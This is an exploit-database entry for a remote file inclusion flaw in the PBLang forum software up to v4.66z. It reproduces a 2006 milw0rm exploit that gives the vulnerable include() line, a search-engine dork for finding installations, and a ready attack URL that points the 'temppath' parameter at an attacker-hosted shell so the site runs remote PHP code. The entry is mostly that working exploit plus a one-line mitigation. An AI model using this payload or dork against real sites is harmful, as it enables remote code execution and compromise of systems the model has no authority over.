header-logo
Suggest Exploit
vendor:
Software PBLang
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Software PBLang
Affected Version From: All Versions Bellow v4.66z
Affected Version To: v4.66z
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Software PBLang <= v4.66z (temppath) Remote File Inclusion Exploit

A vulnerability exists in Software PBLang <= v4.66z due to improper validation of user-supplied input in the 'temppath' parameter of the 'templates/pb/language/lang_nl.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'temppath' parameter.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#Software PBLang <= v4.66z (temppath) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://sourceforge.net/projects/pblang/      
#                                                                      
#Version : 4.66z & All Versions Bellow                                            
#                                                        
#================================================================================================
#
#Dork : "Software PBLang 4.66z" & "Software PBLang 4.60" or "Software PBLang"
#
#================================================================================================
#Bug in : templates/pb/language/lang_nl.php
#
#Vlu Code :
#--------------------------------
#
#                 include($temppath.'/pb/language/lang_en.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/templates/pb/language/lang_nl.php?temppath=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRoN & Simoo & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]